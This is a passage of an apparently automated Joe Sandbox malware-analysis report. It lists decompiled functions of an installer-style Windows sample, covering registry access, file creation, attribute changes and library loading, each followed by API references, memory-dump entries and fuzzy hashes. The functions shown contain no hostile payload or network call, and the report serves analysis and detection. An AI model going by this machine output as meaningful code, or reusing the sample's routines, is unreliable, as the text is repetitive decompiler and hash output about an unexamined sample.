                                                          0x00402542
                                                          0x00402521
                                                          0x00402525
                                                          0x00402525
                                                          0x00402549
                                                          0x00402550
                                                          0x00402551
                                                          0x00402551
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                          • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                          • Opcode Fuzzy Hash: ceb7b32d921ca444f1fc010657555d0ace05083c01aecd1a6f00f0e4ceb8bccc
                                                          • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.667355155.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000002.00000002.667337465.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667366350.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          • Associated: 00000002.00000002.667376456.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_10000000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CreateErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1214770103-0
                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406193(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}








                                                          0x0040247e
                                                          0x0040247e
                                                          0x00402483
                                                          0x0040248a
                                                          0x0040248c
                                                          0x00402493
                                                          0x00402496
                                                          0x00402885
                                                          0x0040249c
                                                          0x0040249f
                                                          0x004024ba
                                                          0x004024ea
                                                          0x004024ea
                                                          0x004024ed
                                                          0x004024bc
                                                          0x004024c0
                                                          0x004024d9
                                                          0x004024e0
                                                          0x004024e3
                                                          0x004024c2
                                                          0x004024c5
                                                          0x004024d0
                                                          0x00402549
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004024c5
                                                          0x004024c0
                                                          0x00402550
                                                          0x00402551
                                                          0x00402551
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjD2A6.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                          • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                          • Opcode Fuzzy Hash: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                          • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x4291ec =  *0x4291ec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x4291ec, 0x7530,  *0x4291d4), 0); // executed
					}
				}
				return 0;
			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                          • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                          • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                          • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402388(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                          0x00402388
                                                          0x00402388
                                                          0x0040238b
                                                          0x0040238e
                                                          0x004023cf
                                                          0x00000000
                                                          0x00402390
                                                          0x00402392
                                                          0x00402397
                                                          0x0040239b
                                                          0x00402885
                                                          0x00402885
                                                          0x004023a1
                                                          0x004023b1
                                                          0x004023b3
                                                          0x004023d1
                                                          0x004023d3
                                                          0x00000000
                                                          0x004023d9
                                                          0x004023d3
                                                          0x0040239b
                                                          0x00402ac2
                                                          0x00402ace

                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                          • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                          • Opcode Fuzzy Hash: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                          • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                          • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                          • Opcode Fuzzy Hash: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                          • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00406626(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065B6(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                          0x0040662e
                                                          0x00406631
                                                          0x00406638
                                                          0x00406640
                                                          0x0040664c
                                                          0x00000000
                                                          0x00406653
                                                          0x00406643
                                                          0x0040664a
                                                          0x00000000
                                                          0x0040665b
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                            • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                            • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                            • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                          • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                          • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E00405D3E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                          0x00405d42
                                                          0x00405d4f
                                                          0x00405d64
                                                          0x00405d6a

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                          • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                          • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405D19(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                          0x00405d1e
                                                          0x00405d24
                                                          0x00405d29
                                                          0x00405d32
                                                          0x00405d32
                                                          0x00405d3b

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                          • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                          • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                          • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
